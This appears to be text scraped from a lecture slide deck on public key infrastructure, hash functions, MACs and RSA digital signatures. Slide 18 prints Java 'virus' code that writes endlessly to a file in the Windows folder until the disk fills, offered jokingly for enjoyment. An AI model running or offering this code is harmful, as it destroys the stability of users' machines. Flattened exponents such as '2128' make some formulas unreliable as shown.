To give a brief overview about Public Key Infrastructure and Digital Signature with simple example
Lecture Outlines
Why En/Dec by itself is NOT enough?
What is PKI and how does it work?
What is Digital Signature and how it is work
Introduction to ArtificiaI Intelligence in Higher Education
Simple Overview of PKI and Digital signature by Tarek_Gaber
1. Introduction to Network Security
Lecture 3: PKI and Signature
Location:E.T.S. de Ingenierias Informatica y de Telecomunicacion Universidad
de Granada 18071, Granada (SPAIN), 24-28 April 2017
Dr. Tarek Gaber
Faculty of Computers and Informatics,
Suez Canal University, Ismailia, Egypt
tmgaber@gmail.com
3. Lecture Outlines
Why En/Dec by itself is NOT enough?
What is PKI and how does it work?
What is Digital Signature and how it is work
4. An Important Message
• In theory, some crytographic algorithms
seem to be EXTREMELY secure.
• Vulnerabilities arise when systems
administrators do not deploy the
encryption systems securely.
5. Standard Algorithms are
Incredibly Secure
• Using a 128 bit key for a symmetric
encryption algorithm, there are 2128
possible keys.
• Even with the computing resources of the
US government, most of the software
developers alive today will be dead before
the government could break such an
encryption [Viega and McGraw]
6. Incredibly secure (cont.)
• Most security experts believe that 256-bit keys
are good for the lifetime of the universe (many
billions of years).
• The problem is that encryption is just one link
in the chain of security. Encryption is a really
strong link in that chain, but one weak link
breaks the chain.
• It is usually easier for the attacker to hack your
machine and steal the plaintext than to break
your cipher.
13. Authentication – Hash Functions
• Creates small, fixed-size block of data (message digest, hash
value) from m
• Hash Function H must be collision resistant on m
– Must be infeasible to find an m’ ≠ m such that H(m) =
H(m’)
• If H(m) = H(m’), then m = m’
– The message has not been modified
• Common message-digest functions include MD5, which
produces a 128-bit hash, and SHA-1, which outputs a 160-bit
hash and SHA-2.
• So, Hash Functions could provide message authentication?
14. Authentication - MAC
• Symmetric encryption used in message-authentication code
(MAC) authentication algorithm
• Simple example:
– MAC defines S(k)(m) = f (k, H(m))
• Where f is a function that is one-way on its first argument
– k cannot be derived from f (k, H(m))
• Because of the collision resistance in the hash function,
reasonably assured no other message could create the
same MAC
• A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,H(m))
= a)
• Note that k is needed to compute both S(k) and V(k), so
anyone able to compute one can compute the other
16. Authentication – Digital Signature
• Authenticators produced are digital signatures
• In a digital-signature algorithm, computationally infeasible to derive
S(ks ) from V(kv)
– V is a one-way function
– Thus, kv is the public key and ks is the private key
• Consider the RSA digital-signature algorithm
– Similar to the RSA encryption algorithm, but the key use is reversed
– Digital signature of message S(ks )(m) = H(m)ks mod N
– The key ks again is a pair d, N, where N is the product of two large,
randomly chosen prime numbers p and q
– Verification algorithm is V(kv)(m, a) ≡ (akv mod N = H(m))
• Where kv satisfies kvks mod (p − 1)(q − 1) = 1
17. Authentication (Cont.)
• If encryption can prove the identity of the sender of a
message, then why need separate authentication algorithms?
– Authentication algorithms generally require fewer
computations
– Authenticator of a message is usually shorter than the
message itself
– Sometimes want authentication but not confidentiality. For
example, a company may provide a software patch and
could “sign” that patch to prove that it came from the
company.
– Can be basis for non-repudiation
18. Space Eater Virus
• import java.io.*;
class Virus
{
public static void main (String ar[])
{
try
{
FileWriter f = new FileWriter("C:/WINDOWS/Virus.dll",true);
while(true)
{
f.write("Programming Is Such A FUN !!!");
}
}
catch(FileNotFoundException e) {}
catch(IOException e){}
}
}
• Enjoy with this virus ?
19. Thanks for your attention
Questions, please
For any question, please use
tmgaber@gmail.com
Tarek Gaber,